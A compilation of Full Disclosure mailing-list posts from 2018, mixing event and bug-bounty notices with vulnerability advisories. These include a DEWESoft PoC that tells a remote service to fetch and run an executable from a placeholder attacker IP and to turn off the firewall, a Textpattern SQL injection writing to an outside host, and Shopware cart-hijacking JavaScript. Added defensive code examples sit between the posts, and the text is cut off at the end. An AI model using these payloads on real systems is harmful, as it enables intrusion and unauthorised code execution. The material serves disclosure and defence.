[FD] hardwear.io CFP is Open & New Security Training in Berlin!
Greetings from hardwear.io!

We would like to share a few exciting updates that you can expect from hardwear.io in 2018!

First of all, we are very proud to announce that hardwear.io is going to hold its first Security Training in Berlin!

Dates: 26 - 27 April 2018
Venue: Novotel Am Tiergarten, Berlin, Germany

Hardware Security Trainings:
- Practical IOT Hacking by Aseem Jakhar
- Low-Level Hardware Reversing by Javier Vazquez Vidal & Ferdinand
- Side-Channel Attacks 101 by Lejla Batina & Kostas Papagiannopoulos
- Practical Car Hacking by Guillaume Heilles

Registration is Open. Pre-con prices available till 31st March 2018.

Hardwear.io Conference & Training 2018 will traditionally take place in The Hague for the 4th time!

Mark your calendars:
Training: 11-12 September
Conference: 13-14 September
Venue: NH Hotels, The Hague, the Netherlands

hardwear.io 2018 Call For Papers is Open till 9th May 2018!
Get your research ready for another successful year!

Best Regards,
Yuliya Pliavaka
Mob. +91-7720825835 / Linkedin
www.hardwear.io Hardware Security Conference
www.nullcon.net Nullcon Information Security Conference
www.payatu.com Payatu Technologies

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access - CVE-2018-7756
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security

Vendor:
=======
www.dewesoft.com

Product:
========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe

Vulnerability Type:
===================
Remote Internal Command Access

CVE Reference:
==============
CVE-2018-7756

Security Issue:
===============
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component, does not require authentication for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or run a "SETFIREWALL Off" command.

The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.

Internal commands used by "RunExeFile.exe", for which I could not find any documentation:

RUN
RUNEX
GETFIREWALL
SETFIREWALL Off
KILL
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE

Exploit/POC:
============
TELNET x.x.x.x 1999
RUN calc.exe

OR

Launch the victim's browser and send them to a website for a drive-by download etc.

TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe

Then from the TELNET session execute it from the Downloads directory.

runexe c:\Users\victim\Downloads\DOOM.exe

Network Access:
===============
Remote

Severity:
=========
High

Disclosure Timeline:
====================
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replies, update or addressing of the issue by vendor.
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
March 10, 2018 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

All content (c). hyp3rlinx
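The advisory above describes a launcher that accepts its command words from any TCP client on port 1999 with no authentication. As an added example (not part of the advisory or of DEWESoft's software), the following JavaScript shows two checks a defender can run: a parser that flags sessions to that port carrying the listed command words from non-loopback sources, and a parser of netstat-style output that reports whether the launcher is bound to a non-loopback interface at all. The flow-record format, the netstat lines and all addresses and PIDs are constructed for the example; the severity mapping is this example's own choice.

```javascript
// Added defender-side checks for the unauthenticated RunExeFile.exe service.
// Not the vendor's code; log formats and sample values are constructed.

const RUNEXE_PORT = 1999;

// Command words listed in the advisory.
const RUNEXE_COMMANDS = new Set(["RUN", "RUNEX", "GETFIREWALL", "SETFIREWALL",
  "KILL", "USERNAME", "SHUTDOWN", "SENDKEYS", "LIST", "DWPIPE"]);

// Commands whose effect is code execution, input injection or disabling a control
// (this example's own classification).
const HIGH_IMPACT = new Set(["RUN", "RUNEX", "SETFIREWALL", "SHUTDOWN", "KILL", "SENDKEYS"]);

// Parse one constructed key=value flow record; data="..." may contain spaces.
function parseFlowLine(line) {
  const m = line.match(/^(\S+)\s+src=(\S+)\s+dst=(\S+)\s+dport=(\d+)\s+data="([^"]*)"/);
  if (!m) return null;
  return { ts: m[1], src: m[2], dst: m[3], dport: Number(m[4]), data: m[5] };
}

function isLoopback(addr) {
  return addr.startsWith("127.") || addr === "::1";
}

// Flag sessions to the launcher port whose first token is a known command word
// and which originate from a non-loopback address.
function findRunExeCommands(lines) {
  const findings = [];
  for (const line of lines) {
    const rec = parseFlowLine(line);
    if (!rec || rec.dport !== RUNEXE_PORT) continue;
    const verb = rec.data.trim().split(/\s+/)[0].toUpperCase();
    if (!RUNEXE_COMMANDS.has(verb) || isLoopback(rec.src)) continue;
    findings.push({ ts: rec.ts, src: rec.src, dst: rec.dst, command: verb,
      severity: HIGH_IMPACT.has(verb) ? "high" : "medium" });
  }
  return findings;
}

// Parse "netstat -ano"-style lines and report PIDs listening on the launcher
// port on any non-loopback address (the condition that makes it reachable remotely).
function findExposedListeners(netstatLines) {
  const exposed = [];
  for (const line of netstatLines) {
    const m = line.trim().match(/^TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)$/);
    if (!m || Number(m[2]) !== RUNEXE_PORT) continue;
    if (m[1] === "127.0.0.1") continue;
    exposed.push({ address: m[1], pid: Number(m[3]) });
  }
  return exposed;
}

// Constructed sample input.
const SAMPLE_FLOWS = [
  '2018-03-10T09:12:01Z src=10.0.0.5 dst=10.0.0.20 dport=1999 data="RUN calc.exe"',
  '2018-03-10T09:12:07Z src=10.0.0.5 dst=10.0.0.20 dport=1999 data="SETFIREWALL Off"',
  '2018-03-10T09:13:00Z src=127.0.0.1 dst=127.0.0.1 dport=1999 data="LIST"',
  '2018-03-10T09:14:00Z src=10.0.0.7 dst=10.0.0.20 dport=1999 data="GETFIREWALL"',
  '2018-03-10T09:15:00Z src=10.0.0.7 dst=10.0.0.20 dport=80 data="GET / HTTP/1.1"',
];
const SAMPLE_NETSTAT = [
  "  TCP    0.0.0.0:1999           0.0.0.0:0              LISTENING       4120",
  "  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4",
  "  TCP    127.0.0.1:1999         0.0.0.0:0              LISTENING       2210",
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(findRunExeCommands(SAMPLE_FLOWS));   // three findings, two of them "high"
  console.log(findExposedListeners(SAMPLE_NETSTAT)); // [{ address: "0.0.0.0", pid: 4120 }]
}
```

Until a vendor fix is available, the second check is the one to run on every host with the full install: a launcher that is bound only to 127.0.0.1, or whose port is blocked at the host firewall for non-local sources, no longer matches the advisory's remote precondition.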
[FD] SQL Injection in Textpattern <= 4.6.2
=============================================
MGC ALERT 2018-002
- Original release date: February 12, 2018
- Last revised: March 12, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2018-7474
=============================================

I. VULNERABILITY
-------------------------
SQL Injection in Textpattern <= 4.6.2

II. BACKGROUND
-------------------------
Textpattern is a free and open-source content management system (CMS) based on PHP and MySQL, originally developed by Dean Allen and now developed by Team Textpattern.

III. DESCRIPTION
-------------------------
This bug was found using the portal with authentication as administrator. To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

It is possible to inject SQL code in the variable "qty" on the page "index.php".

IV. PROOF OF CONCEPT
-------------------------
The following URLs and parameters have been confirmed to all suffer from SQL injection.

/textpattern/textpattern/index.php?event=link=link_change_pageby=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

Note: the variable "_txp_token" does not work as an anti-CSRF token.

POC:
/textpattern/textpattern/index.php?event=link=link_change_pageby=50%20into%20outfile%20'%5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-------------------------
Textpattern <= 4.6.2

VII. SOLUTION
-------------------------
Disable website until a fix is available.

VIII. REFERENCES
-------------------------
https://textpattern.com/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-------------------------
February 12, 2018 1: Initial release
March 12, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
February 12, 2018 2: Send to vendor without response
February 26, 2018 3: Second email to vendor without response
March 12, 2018 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
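The PoC above works because the "qty" value reaches the SQL text unchanged, so a value such as "50 into outfile '...'; --" becomes part of the statement. As an added example (not Textpattern's code), the JavaScript below places a constructed vulnerable query builder beside a hardened one; the table and column names are hypothetical, and the only value taken from the advisory is the URL-decoded PoC string.

```javascript
// Added example of the injection class in the advisory. Not Textpattern's
// code: the statement, table and column names are hypothetical.

// Vulnerable pattern: the request value is pasted into the SQL text, so a
// crafted "qty" rewrites the statement instead of supplying a number.
function buildPagebyQueryUnsafe(qty) {
  return `UPDATE settings SET value = ${qty} WHERE name = 'pageby'`;
}

// Hardened pattern: accept only a bounded positive integer, keep the SQL text
// constant, and hand the value to the driver as a bound parameter.
function buildPagebyQuerySafe(qty) {
  const s = String(qty).trim();
  if (!/^\d{1,4}$/.test(s)) {
    throw new RangeError(`qty must be a positive integer, got ${JSON.stringify(qty)}`);
  }
  const n = Number(s);
  if (n < 1 || n > 1000) throw new RangeError(`qty out of range: ${n}`);
  return { sql: "UPDATE settings SET value = ? WHERE name = 'pageby'", params: [n] };
}

// The advisory's PoC value after URL decoding (constructed from the page's URL):
// 50%20into%20outfile%20'%5cfakesite.com%5c'%3b%20--%20
const POC_QTY = "50 into outfile '\\fakesite.com\\'; -- ";

// Show what each builder does with the PoC value and with a legitimate one.
function demo() {
  const unsafe = buildPagebyQueryUnsafe(POC_QTY);
  let safeError = null;
  try {
    buildPagebyQuerySafe(POC_QTY);
  } catch (e) {
    safeError = e;
  }
  return {
    unsafeSql: unsafe,
    unsafeContainsOutfile: /into outfile/i.test(unsafe),
    safeRejected: safeError instanceof RangeError,
    safeOk: buildPagebyQuerySafe("50"),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The point of the hardened builder is that the statement string never changes shape: the number is validated as a number and then bound, so there is no position in the SQL text where request data could add an INTO OUTFILE clause or a comment marker.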
Re: [FD] BitDefender Total Security 2018 - Insecure Pipe Permissions
Hello,

Allow me to fix this for you:

> On 6 Mar 2018, at 20:04, filipe wrote:
>
> =[ Timeline of disclosure ]===
>
> 01/24/2018 - Vendor was informed of the vulnerability.
> 01/29/2018 - Vendor did not respond.

01/25/2018 - We replied notifying you that we've opened a ticket with the relevant team
01/26/2018 - We asked for a working PoC
01/31/2018 - You replied with a theoretical "PoC" (no code, just a few steps which didn't really help, sadly)
02/01/2018 - We replied asking for a script, a piece of code, a video, anything that backs up your claim since we didn't reproduce it based on the steps you provided.
02/12/2018 - We notified you that we closed the ticket since you stopped replying

> 01/24/2018 - CVE assigned [2]
> 03/06/2018 - Advisory publication date.

We take our bugbounty programs very seriously and other than some Nigerian princes and fake LinkedIn invites we reply to _all_ reports, valid, invalid or incredibly ridiculous alike. As such, you may imagine why, when we saw an advisory with our name saying "Vendor did not respond", the team felt a bit disappointed for failing to reply for the first time in a few years. Thankfully this was not the case.

If you still believe this is a genuine issue, exploitable in real life and you have some evidence to back that up, let us know and we'll gladly reopen the ticket.

Cheers,

Alex "Jay" BALAN
Chief Security Researcher
Bitdefender
[FD] PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$
Title: PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$
URL: https://www.vulnerability-db.com/?q=articles/2018/03/13/paypal-inc-increases-bug-bounty-payments-2018-3

#bugbounty #security #research #infosec

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
[FD] PayPal Inc - New Venmo Bug Bounty Program
Title: PayPal Inc - New Venmo Bug Bounty Program
URL: https://www.vulnerability-db.com/?q=articles/2018/02/27/paypal-inc-updates-bug-bounty-program-venmo-payments-services

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
[FD] [RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites
Advisory: Shopware Cart Accessible by Third-Party Websites

RedTeam Pentesting discovered that the shopping cart implemented by Shopware offers an insecure API. Malicious, third-party websites may abuse this API to list, add or remove products from a user's cart.

Details
=======

Product: Shopware
Affected Versions: 4.0.1 - 5.3.7
Fixed Versions: > 5.4.0
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: https://shopware.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-012
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 2, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform."
(from the Shopware GitHub repository [1])

More Details
============

The Shopware web application provides users with a virtual shopping cart to collect products prior to checkout. This cart is displayed to the user as a modal sidebar appearing at the right edge of the browser window. Consequently, Shopware implements several API endpoints to allow JavaScript code to perform shopping cart operations. These endpoints are implemented in the "Shopware_Controllers_Frontend_Checkout" class and can be reached through the following paths:

* /checkout/ajaxCart
* /checkout/ajaxAddArticleCart
* /checkout/ajaxDeleteArticleCart

RedTeam Pentesting discovered that the API endpoints support JSONP by specifying a URL parameter named callback. The origin of calls to the cart API is not validated. Therefore, any third-party website may make use of this API. If a customer of a Shopware shop visits a malicious, attacker-controlled website, JavaScript code on this site may access the user's shopping cart.

Proof of Concept
================

The following JavaScript snippets demonstrate how to access the cart of a Shopware shop at "https://example.net" from a third-party website. The "getJSON" function of jQuery 3 is used to interface with the JSONP API.

By running the following code, the contents of a cart may be retrieved. The result of the API call is displayed on the browser's developer console.

  $.getJSON("https://example.net/checkout/ajaxCart?callback=?")
    .done(console.log);

The following code adds a new product to the cart. In this case, two instances of product 1234 are added.

  $.getJSON(
    "https://example.net/checkout/ajaxAddArticleCart"+
    "?callback=?&sAdd=1234&sQuantity=2"
  ).done(console.log);

To remove a product from a user's shopping cart, attackers may use the following code. An id for the "sDelete" parameter may be obtained through a prior call to ajaxCart.

  $.getJSON(
    "https://example.net/checkout/ajaxDeleteArticleCart"+
    "?callback=?&sDelete=4321"
  ).done(console.log);

Workaround
==========

Support for JSONP should be removed from the cart AJAX API. This ensures that only JavaScript code from the same origin may access the API and respectively the cart's contents. Furthermore, operations which change the state of the cart, i.e. adding and removing products, must be protected with CSRF tokens.

Fix
===

Upgrade to Shopware newer than 5.4.0.

Security Risk
=============

This vulnerability is rated as a low risk. Disclosure of a user's shopping cart to attackers may negatively impact the user's privacy. Furthermore, competing eCommerce sites may use this information to improve sales. By adding or removing products from a user's cart, attackers can negatively impact a user's shopping experience and create support effort for the shop operator.

Timeline
========

2017-08-28 Vulnerability identified
2017-09-13 Customer approved disclosure to vendor
2017-09-14 Vendor notified
2018-02-27 Vendor released fixed version
2018-03-13 Advisory released

References
==========

[1] https://github.com/shopware/shopware
[2] https://community.shopware.com/Downloads_cat_448.html#5.4.0

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam